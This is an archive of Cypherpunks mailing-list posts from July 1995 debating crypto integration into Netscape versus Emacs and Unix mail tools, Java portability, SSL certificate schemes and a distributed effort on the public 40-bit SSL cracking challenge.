In-Reply-To: <199507201453.HAA19510@jobe.shell.portal.com>
Message-ID: <199507201556.LAA15191@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hal writes:
| >Among other things, SSL only lets you authenticate to X.509
| >certificate roots that have been issued straight from the hands of Jim

| Unfortunately the main alternative to SSL being pushed now, SHTTP, also
| suffers from RSA-itis.  It will support either PEM or PKCS-7 key
| certificates, so I think ends up being pretty much the same as SSL in
| this regard.

	Actually, it also supports Kerberos (not relevant to most of
us), and PGP messaging.  Although a KCA would be needed before anything
useful came of the PGP support, at least its there.

	However, right now, there are few real alternatives to RSA
based schemes.  Has anyone looked deeply at SLED's procedures for key
authentication?

Adam



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Calligaro <mikecal@microsoft.com>
Date: Thu, 20 Jul 95 12:09:40 PDT
To: cypherpunks@toad.com
Subject: Re: cypherpunk "Zen" victories
Message-ID: <9507201945.AA24257@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


<Though I'm not on the list, I read Cypherpunks through the extreme 
filter of a friend who forwards all the good stuff to me.>

Vladimir's post was very good.  I only take issue with the last bit.

<<So the next time that you rant about how some bill or another
means the Death of the Net, or the police investigating a remailer
means the downfall of cryptoanarchy, or a lousy article with a
zillion distortions comes out, think again. The greatest cypherpunk
victories are emerging through what would appear at first to be the
"blackest" moments.>>

So long as you remember that when these things come out we still need 
to scream and yell about them.  The Rimm Job is not a victory simply 
because Rimm was crazy.  It's a victory because many people took the 
time to criticize it and many others took the time to inform the masses 
of that criticism.

These attacks may go in our favor, so long as we direct them in the 
right direction.  There's something Zen in that as well.  Don't punch 
your charging opponent.  Instead misdirect hir energy a bit and let hir 
run into that wall behind you...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Thu, 20 Jul 95 09:13:06 PDT
To: perry@imsi.com
Subject: Re: Netscape the Big Win
In-Reply-To: <9507200747.AA15208@snark.imsi.com>
Message-ID: <199507201612.MAA11998@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



Perry writes: 
> > The relevance for Cypherpunks interested in writing code is that, in my
> > carefully considered opinion, writing for Netscape and other Web browsers
> > is the Big Win. Even over Windows (except Windows browsers, of course).
> 
> Netscape is a closed system. You can't write code for it unless you
> work for Netscape.
> 
> Perry

  I concur with everything you said Perry. However, it may be possible to
write code "for netscape". If their NSAPI (control the browser remotely
via message/event passing) allows full control, you could probably hook
into the crypto functions. If not, you could always generate forms and
html pages on the fly with the data you want to send, and force the
browser to submit them. If the other end has an SHTTP/SSL enabled server,
it will be sent encrypted. It's a yucky solution. If Netscape incorporates
*full* hotjava capability (like defining new protocol handlers such as
SECURE://), then that would be much better. I have some doubts that Netscape
will implement all the Hotjava functionality when they incorporate Java 
because it would allow people to change the look-and-feel (and functionality)
of the browser too much, and also because they would have to softcode
(in java), a lot of the functionality they have hardcoded right now.

  Browsers are beginning to become like emacs. Virtual operating systems
unto themselves.


-Ray






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Thu, 20 Jul 95 09:32:10 PDT
To: pfarrell@netcom.com
Subject: Re: Netscape the Big Win
In-Reply-To: <40697.pfarrell@netcom.com>
Message-ID: <199507201631.MAA18946@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> The current trend is to bundle all types of functionality into huge
> monolithic programs. Add mail to netscape, add encryption, add ...
> 
> Yet most of the computers people use are multi-windows, and soon most
> will even be multi-tasking.
> 
> Why are all-in-one programs so preferable to using the windowing

[why favor the browser approach of sticking all the client functionality
for various protocols into one program]

   The answer is: integration. While TRN is a great newsreader, and 
Eudora's a great mail reader, etc, if I read a post in TRN or a message
in Eudora, there is no hyperlinking. If I see a link or reference,
I have to cut-n-paste it into an ftp session or a web browser.
If "helper applications" for web browsers could talk bidirectionally
with the browser in a meaningful way (display output in the window for
example, and use the browser to open and fetch data), there would be
no need for all this. Isn't it much better to have inline jpeg viewing
in a page rather than launching 10 jpeg viewers externally?

   Since not all operating systems have a standard cross-platform technique
of interapplication communication, it makes porting these helper apps and
browsers all the more difficult.

   The future is in component systems like OpenDoc and HotJava. With HotJava,
you can once again return to "shopping around for the best mail reader
application", however this time, it will be a program you can run from within
the browser. Not only that, but you can automagically download it just by
going to a home page, or placing the mail reader application in your own
homepage.

  It used to be that each media type was stored in a different document,
and a special tool had to be used on each file. Now, all media types
can coexist in the same document, and the "handlers" for each media type
are packaged into the document too (or, links on where to find them)

  I wouldn't be surprised if in 5-10 years, your operating system basically
looks like a cross between Netscape, OpenDoc, and HotJava. The "browser"
would be ubiquituous, and local/LAN/WAN data would be treated transparently.


-Ray





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Thu, 20 Jul 95 09:36:52 PDT
To: dave@dvorak.jta.edd.ca.gov (Dave Otto)
Subject: Re: Netscape the Big Win
In-Reply-To: <199507201449.HAA02245@dvorak.jta.edd.ca.gov>
Message-ID: <199507201636.MAA20551@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> on Wed, 19 Jul 1995 20:24:31 -0800  Douglas Barnes wrote:
> > available on Suns running Solaris 2.4 and PCs running Windows NT.
>                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> Are there any plans to port JAVA to a REAL operating system?  Support
> for crypto needs to be ubiquitous to work.  Start with the fanatics
> (Linux and FreeBSD) and the other platforms will quickly follow (often
> ported by the afore mentioned fanatics so that the departmental server
> can run the same code as their desktop box :-).

  Go to http://java.sun.com and join the java porting list and also the
linux porting list. Suffice it to say, it is being worked on by many people.
The next port coming out will be for the Mac. Linux will probably be right
after that. The problem with porting HotJava (and Java) is that it uses
Solaris Threads, and if your operating system doesn't have a lightweight
process/thread library, you have to port one, or write your own. Secondly,
HotJava uses OpenWindows, and third, it relies on some Solaris specific
memory mapping tricks. (I've heard, there's also some endian problems)

-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 20 Jul 95 12:32:25 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape the Big Win
Message-ID: <ac33f977080210043230@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:25 PM 7/20/95, Patrick J. LoPresti wrote:
>>>>>> "tcmay" == Timothy C May <tcmay@sensemedia.net> writes:
>
> tcmay> Integration of crypto into Netscape is thus the Big Win.
>
> tcmay> I felt this was the case as far back as last fall, but my
> tcmay> recent experiences tell me this is more important than
> tcmay> ever. Integration of PGP and other crypto routines into Tin,
> tcmay> Pine, Elm, Joe, Emacs, etc., is just not as important.
>
>Careful here.  Deliberately or not, you are marginalizing the hard
>work of dozens of people, including me.  You are suggesting our work
>should have been done for Netscape instead, a program that a) is not
>free software (FSF sense); b) has no mail reader; and c) has no
>extension language.  Oh, and d) is horrendous as a news reader.

No offense, but "marginalizing" is what I love to do more than anything!

Seriously, the world is what the world is. I really don't care about "FSF"
one way or the other, and will join the rest of the world (apparently) in
using Netscape. And yes, I am "marginalizing" the work that anyone does on
"fringe" projects like Linux, which will likely always remain in the ghetto
of Unix hackers who want a cheap Unix running on their cheap 486 boxes...it
just ain't gonna take over inside corporations or amongst the many folks
like me.

Frankly, one of the great boons of my current setup is that I can
completely get away from Unix tools and commands, away from my Unix shell
account at Netcom, away from the arcane commands that vary from program to
program, away from tin and elm and emacs...my fingers are already
forgetting the emacs commands!

(Those of you like Unix, fine. I agree it is useful for many things, so I'm
not trying to debate Unix vs. the world. Just giving my perspective, and
apparently the perspective of the many who are adopting the Web browsers as
their "operating environments," insulated from the underlying cruft.)

(If the GNU folks were to do an "open, extensible, Netscape workalike. this
could be a win. Some may claim that Mosaic is/was that. We can debate this
in separate thread.)

I acknowledge that it has no mail reader, which is why I'm still using
Eudora. But as soon as it does....

And the newsreader is a matter of taste...it does all I want it to do, and
I'm a fairly heavy reader of News and contributor to Usenet groups. I
survived with "tin" for several years, so anything is possible.

>The packages that you implicitly denigrate provide far and away the
>best interfaces to PGP available today.  They are written with the
>tools available, whether it's a Windows shell, a hacked version of
>Elm, or an Emacs Lisp package.

I don't think the packages I "denigrate" are the key to the future
widespread use of crypto. Look at the actual usage patterns.


>Netscape is not a platform.  It is a browser.  It is only useful for
>viewing content that others have created, with a user interface that
>any idiot can use.  Consequently, yes, it is very popular with the
>masses and will become more so.

This makes my point. We may dismiss the masses as not being true Unix gurus
or as being ignorant of Emacs, but this is how crypto will become truly
ubiquitous. Not when people have to learn to compile code and create
clients, but when they can send encrypted messages easily and
transparently.

That Qualcomm (Eudora), Netscape, Frontier, Microsoft, Lotus, and others
are working on an interoperable "Secure/MIME" should be encouraging.


>end, but for which none has been written?  If it is ever feasible to
>do what you suggest, someone will do it; your musings will have no
>effect on that.  If you want to make a difference, try writing some
>code yourself...

Please, your insulting tone ("your musings," "try writing some code..") is
uncalled for. You have your views, I have mine.

From the large number of messages in this thread, apparently my points
struck a chord. Like it or not, huge numbers of users are using Netscape
and similar browsers. This is the basic reality. This is where the bulk of
crypto users are going to be, not compiling ftp-gotten PGP into their Emacs
configurations.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 20 Jul 95 13:02:10 PDT
To: Ray Cromwell <pfarrell@netcom.com
Subject: Re: Netscape the Big Win
Message-ID: <ac3402ec0a0210046af5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:31 PM 7/20/95, Ray Cromwell wrote:

>  I wouldn't be surprised if in 5-10 years, your operating system basically
>looks like a cross between Netscape, OpenDoc, and HotJava. The "browser"
>would be ubiquituous, and local/LAN/WAN data would be treated transparently.
>

This is precisely my view, although I try to call it an "operating
environment," so as to get away from quibbling about what is and what is
not a real OS.

There were reasons why some folks like to do as much work as they could in
an integrated environment like Emacs, regardless of the underlying OS
flavor. Many folk still do, and they read News, send mail, etc., all from
within Emacs.

Same idea with Netscape...albeit with a different focus. And my guess,
based on lots of indications, is that about a thousand times as many people
will soon be doing this with Netscape as with Emacs, or elm, or pine, etc.

Ray's comments about OpenDoc, HotJava, and other object-oriented tools fit
this picture, I think.

I am sorry that some folks heavily committed to the Linux route, or to
Emacs, or to GNU/FSF, or to other approaches feel that their work is
technically superior and deserves to be as popular as Netscape and simiar
approaches, but reality is reality.

(And I could be wrong on the way things will unfold. All I'm saying is that
technology is a moving target, that plans have to change, and that ease of
use will likely win out over technical sophistication. Folks who think the
stronger technology will inevitably win should pick up a copy of a
15-year-old book called "The Soul of a New Machine," by Tracy Kidder.)

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Patrick J. LoPresti" <patl@skyclad.lcs.mit.edu>
Date: Thu, 20 Jul 95 10:25:44 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape the Big Win
Message-ID: <199507201725.NAA22141@skyclad.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "tcmay" == Timothy C May <tcmay@sensemedia.net> writes:

 tcmay> Integration of crypto into Netscape is thus the Big Win.

 tcmay> I felt this was the case as far back as last fall, but my
 tcmay> recent experiences tell me this is more important than
 tcmay> ever. Integration of PGP and other crypto routines into Tin,
 tcmay> Pine, Elm, Joe, Emacs, etc., is just not as important.

Careful here.  Deliberately or not, you are marginalizing the hard
work of dozens of people, including me.  You are suggesting our work
should have been done for Netscape instead, a program that a) is not
free software (FSF sense); b) has no mail reader; and c) has no
extension language.  Oh, and d) is horrendous as a news reader.

The packages that you implicitly denigrate provide far and away the
best interfaces to PGP available today.  They are written with the
tools available, whether it's a Windows shell, a hacked version of
Elm, or an Emacs Lisp package.

Maybe Netscape will include a mail reader someday.  Maybe Netscape
will include Java as an extension language someday.  But until that
day, the only people who can put crypto into Netscape are the folks at
Netscape Communications.

 tcmay> IBM just paid nearly $3 billion for Lotus, largely for the
 tcmay> "common platform" of Lotus Notes. I believe Netscape is an
 tcmay> even more important common platform, and will displace Notes.

Netscape is not a platform.  It is a browser.  It is only useful for
viewing content that others have created, with a user interface that
any idiot can use.  Consequently, yes, it is very popular with the
masses and will become more so.

 tcmay> The relevance for Cypherpunks interested in writing code is
 tcmay> that, in my carefully considered opinion, writing for Netscape
 tcmay> and other Web browsers is the Big Win. Even over Windows
 tcmay> (except Windows browsers, of course).

Can you name a platform for which it is possible to write a PGP front
end, but for which none has been written?  If it is ever feasible to
do what you suggest, someone will do it; your musings will have no
effect on that.  If you want to make a difference, try writing some
code yourself...

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.3beta, an Emacs/PGP interface

iQCVAwUBMA6Rg3r7ES8bepftAQG4egQA2QFjXo5wgVOCtz2qGkgBbw80F4U80C1p
d1noVQN95tFYc1vjgk0ftp8n5stURtuD6MEoHNoKDOQgCIzbPlEC9rIETAzW1kfd
GTG8DzRqkcY1YqrTEnLoNiUswIfkVaquf9JrWNSuPKzLZ+IsUto1SxxNjk0fR7pf
ou4k3Fo+3yQ=
=BpNr
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 20 Jul 95 13:28:09 PDT
To: cypherpunks@toad.com
Subject: "Cypherpunks Write Code" as a Putdown
Message-ID: <ac3406e80c0210045a87@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:25 PM 7/20/95, Patrick J. LoPresti wrote:

>                            If it is ever feasible to
>do what you suggest, someone will do it; your musings will have no
>effect on that.  If you want to make a difference, try writing some
>code yourself...

I want to comment on this latest version of the "Cypherpunks write code"
universal putdown.

It's become common for debates on what is possible, what is likely, and
what should be done for someone to "trump" the argument with the mantra of
"Cypherpunks write code."

In my posting on why I think Netscape and related operating environments
represent the likeliest targets for widespread crypto use (the "big win" I
used in my title), I did not whine that others ought to write code for me.
I said that this is where users were going in massive numbers.

Take it or leave it, as an analysis, but the "try writing some code" is a
meaningless insult.

The world is made up of bridge designers, legal experts, authors, chip
designers, and on and on. Not just programmers.

The line "Cypherpunks write code"--which is sometimes treated here with a
reverence its origins do not support--was a reference to our view that
technology, meaning actual deployment, was more important and interesting
than yet more gabbing about liberty and privacy.

And what is "writing code"? Is it only Perl and C? Or does defining what a
remailer needs to do count as writing code? (Attendees at the first
Cypherpunks meeting, almost 3 years ago, can confirm that I was the one who
spend about two hours describing Chaum's mix work, and running the
"remailer experiment"...we debated how a remailer could actually work, and
Eric Hughes took on the task of writing the first one.)

The "BlackNet" experiment I ran actually worked...the keys worked, the
mechanisms worked, and the experiment has been used by many as an actual
concrete illustration of how untraceable information markets will develop.
An actual demonstration is worth more than mere speculation, and this was
an actual demonstration. I call this "writing code," albeit not C code.

(My actual code writing, in real computer languages, is oriented toward
Mathematica, on my Mac, and Smalltalk Agents. Not all programming is
oriented toward writing Unix tools, and I think the narrow interpretation
of "Cypherpunks write code" to mean this is misleading.)

In any case, even the ur-crypto hacker Zimmermann is writing very little
actual code in PGP these days...does this mean he should "try writing some
code" instead of doing what he apparently does best?

In short, the insulting tone of many Cypherpunks these days is saddening.

I plan to continue to speak my mind, to point out what I think are the more
important routes to a desirable future, and to criticize what I think are
dead ends and ghettoized approaches.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 20 Jul 95 13:46:24 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: RANT GENERATORS
In-Reply-To: <9507202028.AA05535@snark.imsi.com>
Message-ID: <Pine.SUN.3.91.950720133756.23898B-100000@crl4.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Geez Louise, what is going on with all this blah, blah about 
fooling our elected representatives (hah) with electronic form 
letters?

If the proponents of this ill-conceived idea had spent half as 
much time actually writing to their congress-entities as they put 
into this silly debate . . .


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 20 Jul 95 13:43:57 PDT
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: Netscape the Big Win
Message-ID: <ac340c990d021004b0d4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:23 PM 7/20/95, Jon Lasser wrote:

>And from what I've heard about HotJava (not seen it yet, can't comment
>strongly) there needs another jump in PC power before it would be useful
>at the home level.  Part of why we were stuck with DOS for so long is
>that it was what got the job done when the revolution happened.  For that
>reason, I agree that HTML/Integrated browser solutions are what we're
>looking at, and at the same time don't have strong hopes for HotJava,
>though I would like to see it succeed.

Just to clarify, you mentioned "useful at the home level." I can't speak
for Ray, but I certainly didn't mean HotJava (or PowerObjects, or OpenDoc,
or Agents tools, etc.) would be used at "the home level."

Such tools would likely be used at the programming level.

As to HotJava itself, who knows? It's one of several tooks coming along.

The key is that folks--millions of them at last count--are voting with
their feet that they want the ball of wax that is "The Web" (Netscape or
Mosaic, HTML, HTTP, browsers, automated handling of images and sounds,
integrated Newsreaders and mailers, etc.).

They, the millions of users, demonstrably don't want to mess with Linux, or
FreeBSD, or PGPelm, or even simple, straight text PGP (that is, PGP not
integrated with mailers, just standalone). They want ease-of-use and a
semantically simple model of how things work. (This is why I like Lisp
Machines when I programmed them for Intel, and why I was an early adopter
of the Macintosh, and why Windows has been doing so well...and why Netscape
is doing spectacularly well.)

This is not an "OS War" I'm taking sides in, just simple truth about what
people are buying, using, clamoring for. It's important to our longer-range
goals to recognize these important trends, like them or not.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Patrick J. LoPresti" <patl@skyclad.lcs.mit.edu>
Date: Thu, 20 Jul 95 11:02:41 PDT
To: cypherpunks@toad.com
Subject: RE: Netscape the Big Win
Message-ID: <199507201802.OAA22155@skyclad.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "pfarrell" == Pat Farrell <pfarrell@netcom.com> writes:

 pfarrell> Why are all-in-one programs so preferable to using the
 pfarrell> windowing capabilities that are built into every X-window,
 pfarrell> Mac or Windows system?

 pfarrell> Why not use the best mail client, another best webcrawler,
 pfarrell> and yet another news reader?

The problem is that existing operating environments do not, in
general, provide good facilities for the kind of tight integration you
really want.

Besides, there is nothing wrong with a monolithic application, as long
as it provides a sufficiently rich extension language.  Take Emacs,
for example.  Emacs is a monolithic application, but I use different
Lisp packages to read news, handle mail, and develop software.  (I
occasionally even just edit text.)

Moreover, I have co-authored a Lisp package to hook PGP functions into
*every* Emacs mail and news package, without ever talking to the
authors of those packages.  In general, any package can be written to
seamlessly integrate with any other.  In addition, all of these
packages work without modification on every variant of Unix, on VMS,
on Windows NT, and sometimes even on DOS.  I can write in beautiful
(and safe) Lisp, and let the Emacs maintainers worry about the
idiosynchracies of each operating system.

The problem with Netscape currently is that all of their packages are
*built in* by Netscape Communications.  That is why they have no mail
handler, and why their news reader sucks, and why it is impossible for
any of us to fix these things or add a PGP front end.

Java looks somewhat promising; with it, perhaps Netscape can become a
platform-independent system for writing packages to manipulate and
display hypertext.  It would be like an Emacs for hypertext, but with
a crufty extension syntax and no source code.  And a user base 1000
times as large...

 pfarrell> Microsoft has been preaching the use of OLE and component
 pfarrell> programs as its development vision for 2+ years, Macs have
 pfarrell> been popular for ten years, why is the trend still towards
 pfarrell> adding every possible bell and whistle to single programs?

These approaches suffer for two reasons.  First, it's a pain to
incorporate the same basic display code into every package.  Second,
it's a pain to rewrite the same basic display code for every window
system.  (Especially when "every window system" means Microsoft,
Macintosh, and X.)  Other subsystems than display have similar
problems (networking comes to mind), but I think display is the major
pain in the groin.

What Netscape could do is provide the engine for hypertext display,
with a sufficiently rich and simple extension language that it would
be easy to write new modules.  Someone would probably write a decent
news reader.  Someone else would write a mail handling package.
Someone else would write a PGP interface.  And so on.  Netscape would
need to provide other functions across platforms, like TCP sockets,
but that isn't impossible: Emacs has done all of this (save graphical
display) for over a decade.

Gosh, we might find ourselves using 1980 technology by the year 2000.

I don't know enough about Netscape's plans for using Java to know
whether any of this is likely to happen.  I'm not even sure I want to
see it happen.  But it would be interesting.

Cheers.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.3beta, an Emacs/PGP interface

iQCVAwUBMA6aLHr7ES8bepftAQEIVgP9G8p4lV1+Uc+6cpLZW4hMF+k7CYYp2Jp6
xh0qZXW0Sd7STPn+sP/fGPvErauGTlDiyIoW5bTJ9srITtFN8U1Yr7QollQZPqUa
5Rhbu7LjFTmixpdo0wiDTuUiRObnoE4Pj+/27EiamEqG160TjGiHDyCodh/eyFWS
8+R/yT5RCPw=
=pja4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Thu, 20 Jul 95 11:51:19 PDT
To: patl@lcs.mit.edu
Subject: Re: Netscape the Big Win
In-Reply-To: <199507201802.OAA22155@skyclad.lcs.mit.edu>
Message-ID: <199507201850.OAA06558@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


[extension languages] 
> Java looks somewhat promising; with it, perhaps Netscape can become a
> platform-independent system for writing packages to manipulate and
> display hypertext.  It would be like an Emacs for hypertext, but with
> a crufty extension syntax and no source code.  And a user base 1000
> times as large...

  The "crufty" extension syntax, is a simplified and improved C++, with all
the features any lisp extension has, minus closures. For user interface
work, and applications existing in a larger environment, object 
oriented languages are superior. LambdaMOO shows lots of evidence for this.
Sun, by choosing a C++ syntax for Java, gains a tremendous advantage by
allowing C/C++ programmers to translate their experience to Java
programming rapidly. In fact, I wish Java had actually been the real
C++. C++ suffers from not having garbage collection, and from overreliance
on pointer manipulation. Now, if only someone can convince Sun to add
operator overloading to Java for the final release..... (really useful
for BigInt programming)

(netscape may not release source code, but the full source code to hotjava
is available)   
-Ray
  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Thu, 20 Jul 95 15:22:46 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Netscape the Big Win
Message-ID: <v02120d3aac348d32ef0b@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



Tim --

HotJava is a web browser that happens to be written in a language
called Java, that runs on top of the Java Virtual Machine, which
is part of what gives this combination of tools the high degree of
platform independence we've been talking about. JVM is the thing
that is currently being ported to different platforms both by Sun
and by others. Also, there is the Abstract Windowing Toolkit, which
provides a set of platform-independent, browser-embeddable GUI tools.

HotJava is the first (and certainly won't be the last) web browser
that allows you to have small Java programs (called applets) as an HTML
document type. These are obtained by the browser in the same way
it obtains a GIF, but they are interpreted and run on the client
machine. A Java program is compiled into Java bytecodes, which have
certain properties that prevent them from, say, breaking out of
their address space, playing cute games with the CPU, etc. Applets
are composed of bytecodes.

Most of the existing applets do stuff like 3D models you
can rotate with the mouse, irritating animations, and enhancements
to forms technology, but Java is a general-purpose language --
one of the most impressive applets I saw initially was a spreadsheet,
plonked down in the middle of a web page. Admittedly, it was a really
stupid spreadsheet, but it did a good job of convincing me that you
could really do anything with this stuff.

I don't get what you mean when you say, "Java isn't ready for the
home market." True, I don't think that programming languages of
any sort are part of the "home market", but I think that Java will
enable people like cypherpunks to write extremely portable applications
_once_ that will be embeddable on web pages viewed by browsers like
Netscape. I can't think of anything that is going to come closer to
your definition of "winning" the home market. Certainly the home
market will be dominated in short order by Win 95 and MacOS (mostly
the former.) I think the Win 95 port of the Java environment is only
awaiting release of Win 95, and the MacOS port has been demoed around town.

Also, Java is entirely orthogonal to issues like particular protocols
or formats, in the same sense the C or Smalltalk are orthogonal to
those same issues. It's just that we will be able to embed access to
those protocols and formats into the popular tools without huge
porting nightmares, or even requiring much cooperation from the
vendors themselves, who are often limited politically by what they
can put in themselves.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Thu, 20 Jul 95 15:42:05 PDT
To: cypherpunks@toad.com
Subject: It had to happen...
Message-ID: <v02120d3eac3499ebec14@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



Has anyone caught this yet? From "No Such Agency" to having
their own Web page... wow.

http://www.nsa.gov:8080/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Andrew Roos" <ANDREWR@real3.realtime.co.za>
Date: Thu, 20 Jul 95 06:46:32 PDT
To: trei@process.com
Subject: Re: (Cracking) Netscape (is) the Big Win
Message-ID: <10AECF4554D@real3.realtime.co.za>
MIME-Version: 1.0
Content-Type: text/plain


Peter Trei says:

> This is why it's imperative for cpunks to work on the SSL challenge
> recently posted. Cracking 40 bit RC4 will provide a strong industry
> incentive to move towards stronger crypto standards, and to pressure
> the government to relax ITAR. 

The SSL project is at an advanced stage. I am regression testing 
the third (and, I hope, final) version of the SSL bruter, while Adam 
and others are working on the key distribution mechanism. It is 
important in a project of this nature that everything be thoroughly
tested before we start, so we don't waste thousands of hours of CPU 
time...
 
Andrew
___________________________________________________________________________

#!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-in-3-lines-PERL
($k,$n)=@ARGV;$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%
Sa2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print pack('H*'
,$_)while read(STDIN,$m,($w=2*$d-1+length($n||die"$0 [-d] k n\n")&~1)/2)

Andrew Roos                                                 Realtime
                                                            PO Box 15170
                                                            Vlaeburg 8018
Phone: +27-21-244350                                        Cape Town                                             Cape Town
Fax:   +27-21-221507                                        South Africa




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 20 Jul 95 12:50:10 PDT
To: cypherpunks@toad.com
Subject: Re: cypherpunk "Zen" victories
Message-ID: <9507201950.AA24205@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


The Boston Globe has a weekly "magazine review" column.  In yesterday's
column they wrote about the Rimm piece, Time's followup, how the Internet
got the story right, and fast, and how HotWired has a really good page
on it.  The column then reviewed the current Wired and said the magazine
is now behind the times.  In particular, contrasting it to the second(?)
issue, "when they covered the Cypherpunks (sic) and their privacy agenda."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Thu, 20 Jul 95 13:28:20 PDT
To: "Timothy C. May" <tcmay@sensemedia.net>
Subject: Re: Netscape the Big Win
In-Reply-To: <ac3402ec0a0210046af5@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.950720161632.12511A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 20 Jul 1995, Timothy C. May wrote:
> There were reasons why some folks like to do as much work as they could in
> an integrated environment like Emacs, regardless of the underlying OS
> flavor. Many folk still do, and they read News, send mail, etc., all from
> within Emacs.
> 
> Same idea with Netscape...albeit with a different focus. And my guess,
> based on lots of indications, is that about a thousand times as many people
> will soon be doing this with Netscape as with Emacs, or elm, or pine, etc.
>
> Ray's comments about OpenDoc, HotJava, and other object-oriented tools fit
> this picture, I think.

Perhaps.  I went to a computer store the other day, and saw almost two 
dozen different packages for e-Space access, each with different 
software... 2 or 3 with netscape, 2 or 3 with mosaic, everything else 
just custom packages, mostly.

And from what I've heard about HotJava (not seen it yet, can't comment 
strongly) there needs another jump in PC power before it would be useful 
at the home level.  Part of why we were stuck with DOS for so long is 
that it was what got the job done when the revolution happened.  For that 
reason, I agree that HTML/Integrated browser solutions are what we're 
looking at, and at the same time don't have strong hopes for HotJava, 
though I would like to see it succeed.

> I am sorry that some folks heavily committed to the Linux route, or to
> Emacs, or to GNU/FSF, or to other approaches feel that their work is
